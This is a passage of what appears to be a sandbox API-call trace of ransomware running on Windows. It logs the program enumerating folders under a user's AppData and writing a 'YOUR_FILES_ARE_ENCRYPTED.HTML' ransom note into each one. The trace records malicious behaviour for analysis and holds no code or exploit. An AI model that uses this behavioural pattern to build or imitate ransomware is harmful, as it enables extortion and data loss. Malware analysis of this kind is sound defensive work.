dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0164.789] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.791] CloseHandle (hObject=0x5b8) returned 1 [0164.792] GetProcessHeap () returned 0x270000 [0164.793] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0164.793] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MetaData", cAlternateFileName="")) returned 1 [0164.793] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 76 [0164.793] GetProcessHeap () returned 0x270000 [0164.793] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0164.793] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0164.793] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*" [0164.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.793] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.793] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1b2bced0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1b2bced0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1b2bced0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x0, dwReserved1=0x60, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0164.793] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37C951188967C8EB88D99893D9D191FE") returned 109 [0164.793] lstrcmpW (lpString1="37C951188967C8EB88D99893D9D191FE", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x195ba2b0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x195ba2b0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x43698eb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0x0, dwReserved1=0x60, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 109 [0164.794] lstrcmpW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x70be18f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x70be18f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x70be18f0, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x60, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 109 [0164.794] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x25285390, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0x0, dwReserved1=0x60, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 109 [0164.794] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x17fb5730, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x17fb5730, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1e52c0f0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0x0, dwReserved1=0x60, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506") returned 109 [0164.794] lstrcmpW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.795] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.795] lstrlenW (lpString="") returned 0 [0164.795] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.795] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60decdd0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x60decdd0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e50b10, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x60, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0164.795] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 109 [0164.795] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.795] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.795] lstrlenW (lpString="") returned 0 [0164.795] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.795] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1e505f90, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1e505f90, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1e52c0f0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x60, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0164.795] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C0018BB1B5834735BFA60CD063B31956") returned 109 [0164.795] lstrcmpW (lpString1="C0018BB1B5834735BFA60CD063B31956", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.795] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.795] lstrlenW (lpString="") returned 0 [0164.795] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xfa, dwReserved0=0x0, dwReserved1=0x60, cFileName="E34E75954A05FA2156EB895949C74728", cAlternateFileName="E34E75~1")) returned 1 [0164.796] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E34E75954A05FA2156EB895949C74728") returned 109 [0164.796] lstrcmpW (lpString1="E34E75954A05FA2156EB895949C74728", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.796] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.796] lstrlenW (lpString="") returned 0 [0164.796] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x67421e70, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x67421e70, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x67421e70, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xf2, dwReserved0=0x0, dwReserved1=0x60, cFileName="F0ACCF77CDCBFF39F6191887F6D2D357", cAlternateFileName="F0ACCF~1")) returned 1 [0164.796] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F0ACCF77CDCBFF39F6191887F6D2D357") returned 109 [0164.796] lstrcmpW (lpString1="F0ACCF77CDCBFF39F6191887F6D2D357", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.796] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.796] lstrlenW (lpString="") returned 0 [0164.796] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0164.796] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 109 [0164.796] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.796] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.796] lstrlenW (lpString="") returned 0 [0164.796] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0164.796] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.797] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0164.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0164.797] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.800] CloseHandle (hObject=0x5b8) returned 1 [0164.800] GetProcessHeap () returned 0x270000 [0164.801] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0164.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MetaData", cAlternateFileName="")) returned 0 [0164.801] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.801] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0164.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\cryptneturlcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0164.802] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.804] CloseHandle (hObject=0x5e4) returned 1 [0164.805] GetProcessHeap () returned 0x270000 [0164.805] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0164.805] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0164.806] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned 68 [0164.806] GetProcessHeap () returned 0x270000 [0164.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0164.806] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0164.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*" [0164.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Services", cAlternateFileName="")) returned 1 [0164.806] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned 77 [0164.806] GetProcessHeap () returned 0x270000 [0164.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0164.806] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0164.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*" [0164.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.806] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.807] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf040c80, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0x0, dwReserved1=0x60, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 1 [0164.807] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned 127 [0164.807] lstrcmpW (lpString1="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.807] PathFindExtensionW (pszPath="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0164.807] lstrlenW (lpString=".ico") returned 4 [0164.807] PathFindExtensionW (pszPath="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0164.807] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf040c80, ftCreationTime.dwHighDateTime=0x1d7e790, 